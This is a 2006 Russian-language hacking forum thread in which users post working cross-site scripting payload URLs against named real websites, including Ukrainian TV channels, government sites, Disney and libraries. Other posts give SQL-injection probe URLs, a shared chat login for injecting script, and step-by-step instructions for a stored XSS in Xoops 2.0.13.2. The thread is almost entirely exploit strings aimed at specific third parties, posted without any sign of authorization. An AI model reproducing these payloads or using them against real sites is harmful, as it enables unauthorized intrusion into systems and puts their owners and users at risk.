Баги на сайтах.

Discussion in 'Уязвимости' started by D1mOn, 28 Jan 2006.

Thread Status:
Not open for further replies.
  1. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    _http://www.mo.com.ua/search.php?sw="><script>alert()</script>
     
  2. Micr0b

    Micr0b Elder - Старейшина

    Joined:
    14 Jan 2006
    Messages:
    223
    Likes Received:
    168
    Reputations:
    26
    Вот нашел баг Xss на сайте телеканала ИНТЕР
    в Украине...

    _http://www.inter.ua/ua/search/?lang='><script>alert('HakNet')</script>
    ----------------------------------------------------
    Вот нашел баг Xss на сайте телеканала ICTV
    в Украине...

    _http://ictv.ua/ukr/search.php?search=1&news_search=1&news_search_words=&news_search_cond=&news_search_exact=&news_search_numrows=&search_section_id=0&search_words=%27%3E%3Cscript%3Ealert%28%27HakNet%27%29%3C%2Fscript%3E&search_cond=1&search_exact=1&search_numrows=5
     
    #262 Micr0b, 21 Jun 2006
    Last edited by a moderator: 24 Jun 2006
  3. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    HakNet не плохо.

    Вот мой баг XSS на сайте transnavi :

    _http://www.transnavi.com/search/?search_key="><script>alert()</script>
     
    1 person likes this.
  4. Micr0b

    Micr0b Elder - Старейшина

    Joined:
    14 Jan 2006
    Messages:
    223
    Likes Received:
    168
    Reputations:
    26
    _http://www.context-ua.com/cgi-bin/query?text='><script>alert('HakNet')</script>

    _http://your-radio.dp.ua/modules.php?name=News&file=search&query='><script>alert('HakNet')</script>

    _http://nrcu.gov.ua/search.php?id_main=1&where=1&search='><script>alert('HakNet')</script>

    http://parlament.org.ua - в поиску вказать '><script>alert('HakNet')</script>
     
    #264 Micr0b, 21 Jun 2006
    Last edited: 21 Jun 2006
  5. Micr0b

    Micr0b Elder - Старейшина

    Joined:
    14 Jan 2006
    Messages:
    223
    Likes Received:
    168
    Reputations:
    26
    Кароче нашел глюченой чат ...
    Простите чо в етом розделе...но просто пашет прикольно XSS

    link: http://www.elib.ru/cgi-bin/Chat.pl

    login: lol
    pass: 1988

    ожно и не только ето
    '><script>alert('HakNet')</script>
    а и много другого...))) пашет всё.. :)
     
  6. Micr0b

    Micr0b Elder - Старейшина

    Joined:
    14 Jan 2006
    Messages:
    223
    Likes Received:
    168
    Reputations:
    26
    Ну бедный дядюшка Disney и на его сайте есть XSS

    http://search.disney.go.com/?oq='><script>alert('HakNet')</script>
     
    #266 Micr0b, 21 Jun 2006
    Last edited: 21 Jun 2006
  7. Micr0b

    Micr0b Elder - Старейшина

    Joined:
    14 Jan 2006
    Messages:
    223
    Likes Received:
    168
    Reputations:
    26
    Вот Xss на журнале НАТАЛИ в Украине
    http://www.natali.ua/materials/search/%20"><script>alert()</script>
     
    #267 Micr0b, 21 Jun 2006
    Last edited: 25 Jun 2006
  8. LoFFi

    LoFFi Elder - Старейшина

    Joined:
    21 Feb 2006
    Messages:
    194
    Likes Received:
    90
    Reputations:
    85
    Бесполезно, но улыбнуло =)
    http://www.blizzard.com/support/wow/?id=aww01671p'
     
  9. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    _http://search.finam.ru/cgi-bin/ff.pl?query="><script>alert('dracula4ever')</script>
     
    #269 Dracula4ever, 22 Jun 2006
    Last edited by a moderator: 24 Jun 2006
  10. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    _http://www.myjane.ru/search/default.asp?searchword="><script>alert('dracula4ever')</script>
     
  11. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26

    А че с ним должно быть????



    Вот ещё несколько XSS :

    _http://lib.usu.ru/search/?search%5Bquery%5D="><script>alert()</script>

    _http://ncagip.ru/search?needle="><script>alert()</script>
     
  12. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    _http://kungrad.com/index/search/?keywords="><script>alert()</script>
     
  13. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    _http://www.uefexpo.ru/?p__search_text2="><script>alert()</script>
     
  14. CyberPunk

    CyberPunk Elder - Старейшина

    Joined:
    25 May 2006
    Messages:
    115
    Likes Received:
    38
    Reputations:
    10
    _http://www.opentech.ru/index.php?curr_node='
     
  15. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    _http://www.membrana.ru/search.html?text="><script>alert()</script>
     
  16. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    http://www.sapphiretech.com/rs/media/pressview.php?pid=25' производство карт радеон сапфир )
     
  17. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    _http://www.uefexpo.ru/?p__search_text2="><script>alert()</script>
     
  18. _kREveDKo_

    _kREveDKo_ _kREveDKo_

    Joined:
    4 Dec 2005
    Messages:
    778
    Likes Received:
    620
    Reputations:
    1,040
    Xoops v2.0.13.2

    Маленький баг в Xoops v2.0.13.2 : Активная XSS

    Заходим в редактирование профиля и с помощью IE_XSS_KIT от zFailure кликаем в менюшке на
    "Form Select-one2Text". Ищем поле "Comments Display Mode" и меняем то что там написано на
    "><h1>XSS!. Теперь если мы пройдём по адресу

    http://xex.ru/путь_к_xoops/modules/mylinks/singlelink.php?cid=3&lid=1

    и нажмём на "Comments", nо при условии, что в движке включён модуль для работы с ссылками,
    мы сможем лицезреть активную XSS. Почему я назвал это Маленьким багом? Потому что вместительность
    переменной, куда мы вставили сплойт составляет 10 символов =).
     
  19. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    _http://www.nlr.ru/udmsearch.zhtml?q="><script>alert()</script>
     
  20. _kREveDKo_

    _kREveDKo_ _kREveDKo_

    Joined:
    4 Dec 2005
    Messages:
    778
    Likes Received:
    620
    Reputations:
    1,040
    http://bluejack.ru/cgi-bin/show_user.pl?searchstr=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E
     
Thread Status:
Not open for further replies.